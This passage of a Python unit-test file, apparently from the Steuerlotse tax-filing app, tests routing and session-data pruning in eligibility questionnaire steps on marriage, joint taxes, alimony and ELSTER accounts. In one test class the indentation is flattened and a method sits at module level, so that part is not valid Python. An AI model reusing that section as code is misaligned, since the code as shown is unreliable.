    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        polluted = {**self.correct_session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing(polluted)
            self._get_step().handle()
            self.assertEqual(self.correct_session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing(self.correct_session_data)
            self._get_step().handle()
            self.assertEqual(self.correct_session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        expected_data = {'marital_status_eligibility': 'single',
                         'separated_since_last_year_eligibility': 'no',
                         'separated_lived_together_eligibility': 'no',
                         'separated_joint_taxes_eligibility': 'no', }
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing(FULL_SESSION_DATA)
            self._get_step().handle()
            self.assertEqual(expected_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestMarriedJointTaxesEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
    """The married joint-taxes failure page must link back to its decision step."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        self.app = app

    def test_handle_sets_correct_prev_url(self):
        with self.app.test_request_context():
            render_info = MarriedJointTaxesEligibilityFailureDisplaySteuerlotseStep.prepare_render_info({})
            step = MarriedJointTaxesEligibilityFailureDisplaySteuerlotseStep(
                endpoint='eligibility', render_info=render_info)
            expected_url = step.url_for_step(MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.prev_url)
class TestMarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Routing and session-pruning tests for the married joint-taxes decision step."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        self.app = app

    def setUp(self):
        self.correct_session_data = {'marital_status_eligibility': 'married',
                                     'separated_since_last_year_eligibility': 'no'}

    @staticmethod
    def _session_containing(data):
        # Session object holding serialized eligibility data under the expected key.
        return SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(data)})

    @staticmethod
    def _post_step(answer):
        return EligibilityStepChooser('eligibility').get_correct_step(
            MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, True,
            form_data=ImmutableMultiDict({'joint_taxes_eligibility': answer}))

    @staticmethod
    def _get_step():
        return EligibilityStepChooser('eligibility').get_correct_step(
            MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))

    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = self._session_containing(self.correct_session_data)
            step = self._post_step('yes')
            expected_url = step.url_for_step(MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_failure_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = self._session_containing(self.correct_session_data)
            step = self._post_step('no')
            expected_url = step.url_for_step(MarriedJointTaxesEligibilityFailureDisplaySteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing(self.correct_session_data)
            step = self._get_step()
            expected_url = step.url_for_step(SeparatedEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.prev_url)

    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        with self.app.test_request_context(method='POST'), \
                patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                      MagicMock(side_effect=PreviousFieldsMissingError)):
            step = self._post_step('yes')
            self.assertRaises(IncorrectEligibilityData, step.handle)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        expected_data = {'marital_status_eligibility': 'single',
                         'separated_since_last_year_eligibility': 'no',
                         'joint_taxes_eligibility': 'no', }
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing({**expected_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}})
            self._get_step().handle()
            self.assertEqual(expected_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        stored_data = {'marital_status_eligibility': 'single',
                       'separated_since_last_year_eligibility': 'no',
                       'joint_taxes_eligibility': 'no', }
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing(stored_data)
            self._get_step().handle()
            self.assertEqual(stored_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        expected_data = {'marital_status_eligibility': 'single',
                         'separated_since_last_year_eligibility': 'no',
                         'joint_taxes_eligibility': 'no', }
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing(FULL_SESSION_DATA)
            self._get_step().handle()
            self.assertEqual(expected_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestMarriedAlimonyEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
    """The married alimony failure page must link back to its decision step."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, test_request_context):
        self.test_request_context = test_request_context

    def test_handle_sets_correct_prev_url(self):
        render_info = MarriedAlimonyEligibilityFailureDisplaySteuerlotseStep.prepare_render_info({})
        step = MarriedAlimonyEligibilityFailureDisplaySteuerlotseStep(
            endpoint='eligibility', render_info=render_info)
        expected_url = step.url_for_step(MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
        step.handle()
        self.assertEqual(expected_url, step.render_info.prev_url)
class TestMarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'alimony_eligibility': 'no'}))
expected_url = step.url_for_step(UserAElsterAccountEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_failure_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'alimony_eligibility': 'yes'}))
expected_url = step.url_for_step(MarriedAlimonyEligibilityFailureDisplaySteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_not_separated_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_separated_correct_session_data_then_set_prev_input_step_correctly(self):
alternative_data = {**self.correct_session_data, **{'separated_since_last_year_eligibility': 'yes',
'separated_lived_together_eligibility': 'yes',
'separated_joint_taxes_eligibility': 'yes'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with self.app.test_request_context(method='POST'), \
patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'alimony_eligibility': 'no'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_multiple_users_then_show_multiple_text(self):
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes'}
expected_number_of_users = 2
expected_choices = [('yes', ngettext('form.eligibility.alimony.yes', 'form.eligibility.alimony.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.alimony.no', 'form.eligibility.alimony.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.alimony_eligibility.choices)
def test_if_single_user_then_show_single_text(self):
    """Without joint taxes only one user files, so the singular label variant must be offered."""
    stored_data = {'marital_status_eligibility': 'single',
                   'separated_since_last_year_eligibility': 'no',
                   'joint_taxes_eligibility': 'no'}
    number_of_users = 1
    expected_choices = [
        ('yes', ngettext('form.eligibility.alimony.yes', 'form.eligibility.alimony.yes',
                         num=number_of_users)),
        ('no', ngettext('form.eligibility.alimony.no', 'form.eligibility.alimony.no',
                        num=number_of_users)),
    ]
    with self.app.test_request_context(method='GET') as ctx:
        ctx.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(stored_data)})
        step = EligibilityStepChooser('eligibility').get_correct_step(
            MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
        step._pre_handle()
        self.assertEqual(expected_choices, step.render_info.form.alimony_eligibility.choices)
class TestUserAElsterAccountEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the step asking whether user A already has an ELSTER account."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        self.app = app

    def setUp(self):
        self.correct_session_data = {'marital_status_eligibility': 'married',
                                     'separated_since_last_year_eligibility': 'no',
                                     'joint_taxes_eligibility': 'yes',
                                     'alimony_eligibility': 'no'}

    @staticmethod
    def _session_with(data):
        # Build a session cookie holding *data* under the eligibility key.
        return SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(data)})

    @staticmethod
    def _resolve_step(should_update, form_data):
        # Fetch this step from the chooser; requires an active request context.
        return EligibilityStepChooser('eligibility').get_correct_step(
            UserAElsterAccountEligibilityInputFormSteuerlotseStep.name, should_update, form_data)

    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(True, ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'no'}))
            target_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        with self.app.test_request_context(method='POST') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(True, ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'yes'}))
            target_url = step.url_for_step(UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.next_url)

    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            target_url = step.url_for_step(MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.prev_url)

    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = self._resolve_step(True, ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'no'}))
            self.assertRaises(IncorrectEligibilityData, step.handle)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        expected = {'marital_status_eligibility': 'single',
                    'separated_since_last_year_eligibility': 'no',
                    'user_a_has_elster_account_eligibility': 'no',
                    'joint_taxes_eligibility': 'no',
                    'alimony_eligibility': 'no'}
        polluted = dict(expected, INCORRECT_KEY='UNNECESSARY_VALUE')
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(polluted)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(expected, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        stored = {'marital_status_eligibility': 'single',
                  'separated_since_last_year_eligibility': 'no',
                  'user_a_has_elster_account_eligibility': 'no',
                  'joint_taxes_eligibility': 'no',
                  'alimony_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(stored)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(stored, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        expected_remaining = {'marital_status_eligibility': 'single',
                              'separated_since_last_year_eligibility': 'no',
                              'separated_joint_taxes_eligibility': 'no',
                              'separated_lived_together_eligibility': 'no',
                              'user_a_has_elster_account_eligibility': 'no',
                              'joint_taxes_eligibility': 'no',
                              'alimony_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(FULL_SESSION_DATA)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(expected_remaining, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))
class TestUserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the step asking whether user B already has an ELSTER account."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        self.app = app

    def setUp(self):
        self.correct_session_data = {'marital_status_eligibility': 'married',
                                     'separated_since_last_year_eligibility': 'no',
                                     'joint_taxes_eligibility': 'yes',
                                     'alimony_eligibility': 'no',
                                     'user_a_has_elster_account_eligibility': 'yes'}

    @staticmethod
    def _session_with(data):
        # Build a session cookie holding *data* under the eligibility key.
        return SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(data)})

    @staticmethod
    def _resolve_step(should_update, form_data):
        # Fetch this step from the chooser; requires an active request context.
        return EligibilityStepChooser('eligibility').get_correct_step(
            UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, should_update, form_data)

    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(True, ImmutableMultiDict({'user_b_has_elster_account_eligibility': 'no'}))
            target_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        # Both answers lead to the pension question; 'yes' is still a valid flow here.
        with self.app.test_request_context(method='POST') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(True, ImmutableMultiDict({'user_b_has_elster_account_eligibility': 'yes'}))
            target_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.next_url)

    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            target_url = step.url_for_step(UserAElsterAccountEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.prev_url)

    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = self._resolve_step(True, ImmutableMultiDict({'user_b_has_elster_account_eligibility': 'no'}))
            self.assertRaises(IncorrectEligibilityData, step.handle)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        expected = {'marital_status_eligibility': 'single',
                    'separated_since_last_year_eligibility': 'no',
                    'user_a_has_elster_account_eligibility': 'no',
                    'user_b_has_elster_account_eligibility': 'no',
                    'joint_taxes_eligibility': 'no',
                    'alimony_eligibility': 'no'}
        polluted = dict(expected, INCORRECT_KEY='UNNECESSARY_VALUE')
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(polluted)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(expected, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        stored = {'marital_status_eligibility': 'single',
                  'separated_since_last_year_eligibility': 'no',
                  'user_a_has_elster_account_eligibility': 'no',
                  'user_b_has_elster_account_eligibility': 'no',
                  'joint_taxes_eligibility': 'no',
                  'alimony_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(stored)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(stored, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        expected_remaining = {'marital_status_eligibility': 'single',
                              'separated_since_last_year_eligibility': 'no',
                              'separated_joint_taxes_eligibility': 'no',
                              'separated_lived_together_eligibility': 'no',
                              'user_a_has_elster_account_eligibility': 'no',
                              'user_b_has_elster_account_eligibility': 'no',
                              'joint_taxes_eligibility': 'no',
                              'alimony_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(FULL_SESSION_DATA)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(expected_remaining, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))
class TestDivorcedJointTaxesEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
    """The divorced joint-taxes failure page must link back to its decision step."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, test_request_context):
        self.req = test_request_context

    def test_handle_sets_correct_prev_url(self):
        render_info = DivorcedJointTaxesEligibilityFailureDisplaySteuerlotseStep.prepare_render_info({})
        step = DivorcedJointTaxesEligibilityFailureDisplaySteuerlotseStep(
            endpoint='eligibility', render_info=render_info)
        target_url = step.url_for_step(DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name)
        step.handle()
        self.assertEqual(target_url, step.render_info.prev_url)
class TestDivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the joint-taxes question shown to divorced users."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        self.app = app

    def setUp(self):
        self.correct_session_data = {'marital_status_eligibility': 'divorced'}

    @staticmethod
    def _session_with(data):
        # Build a session cookie holding *data* under the eligibility key.
        return SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(data)})

    @staticmethod
    def _resolve_step(should_update, form_data):
        # Fetch this step from the chooser; requires an active request context.
        return EligibilityStepChooser('eligibility').get_correct_step(
            DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, should_update, form_data)

    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(True, ImmutableMultiDict({'joint_taxes_eligibility': 'no'}))
            target_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        with self.app.test_request_context(method='POST') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(True, ImmutableMultiDict({'joint_taxes_eligibility': 'yes'}))
            target_url = step.url_for_step(DivorcedJointTaxesEligibilityFailureDisplaySteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.next_url)

    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            target_url = step.url_for_step(MaritalStatusInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.prev_url)

    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = self._resolve_step(True, ImmutableMultiDict({'joint_taxes_eligibility': 'no'}))
            with pytest.raises(IncorrectEligibilityData):
                step.handle()

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        expected = {'marital_status_eligibility': 'single',
                    'joint_taxes_eligibility': 'no'}
        polluted = dict(expected, INCORRECT_KEY='UNNECESSARY_VALUE')
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(polluted)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(expected, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        stored = {'marital_status_eligibility': 'single',
                  'joint_taxes_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(stored)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(stored, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        expected_remaining = {'marital_status_eligibility': 'single',
                              'joint_taxes_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(FULL_SESSION_DATA)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(expected_remaining, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))
class TestSingleAlimonyEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
    """The single-alimony failure page must link back to its decision step."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, test_request_context):
        self.req = test_request_context

    def test_handle_sets_correct_prev_url(self):
        render_info = SingleAlimonyEligibilityFailureDisplaySteuerlotseStep.prepare_render_info({})
        step = SingleAlimonyEligibilityFailureDisplaySteuerlotseStep(
            endpoint='eligibility', render_info=render_info)
        target_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
        step.handle()
        self.assertEqual(target_url, step.render_info.prev_url)
class TestSingleAlimonyDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the alimony question shown to users filing alone."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        self.app = app

    def setUp(self):
        self.correct_session_data = {'marital_status_eligibility': 'divorced',
                                     'joint_taxes_eligibility': 'no'}

    @staticmethod
    def _session_with(data):
        # Build a session cookie holding *data* under the eligibility key.
        return SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(data)})

    @staticmethod
    def _resolve_step(should_update, form_data):
        # Fetch this step from the chooser; requires an active request context.
        return EligibilityStepChooser('eligibility').get_correct_step(
            SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, should_update, form_data)

    def _assert_prev_url_for(self, stored_data, prev_step):
        # GET the step with *stored_data* in the session and check prev_url points at *prev_step*.
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(stored_data)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            target_url = step.url_for_step(prev_step.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.prev_url)

    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(True, ImmutableMultiDict({'alimony_eligibility': 'no'}))
            target_url = step.url_for_step(SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        with self.app.test_request_context(method='POST') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(True, ImmutableMultiDict({'alimony_eligibility': 'yes'}))
            target_url = step.url_for_step(SingleAlimonyEligibilityFailureDisplaySteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.next_url)

    def test_if_divorced_session_data_correct_then_set_prev_input_step_correctly(self):
        self._assert_prev_url_for(self.correct_session_data,
                                  DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep)

    def test_if_single_session_data_correct_then_set_prev_input_step_correctly(self):
        self._assert_prev_url_for({'marital_status_eligibility': 'single'},
                                  MaritalStatusInputFormSteuerlotseStep)

    def test_if_widowed_session_data_correct_then_set_prev_input_step_correctly(self):
        self._assert_prev_url_for({'marital_status_eligibility': 'widowed'},
                                  MaritalStatusInputFormSteuerlotseStep)

    def test_if_separated_not_lived_together_session_data_correct_then_set_prev_input_step_correctly(self):
        self._assert_prev_url_for({'marital_status_eligibility': 'married',
                                   'separated_since_last_year_eligibility': 'yes',
                                   'separated_lived_together_eligibility': 'no'},
                                  SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep)

    def test_if_separated_not_joint_taxes_session_data_correct_then_set_prev_input_step_correctly(self):
        self._assert_prev_url_for({'marital_status_eligibility': 'married',
                                   'separated_since_last_year_eligibility': 'yes',
                                   'separated_lived_together_eligibility': 'yes',
                                   'separated_joint_taxes_eligibility': 'no'},
                                  SeparatedJointTaxesEligibilityInputFormSteuerlotseStep)

    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = self._resolve_step(True, ImmutableMultiDict({'alimony_eligibility': 'no'}))
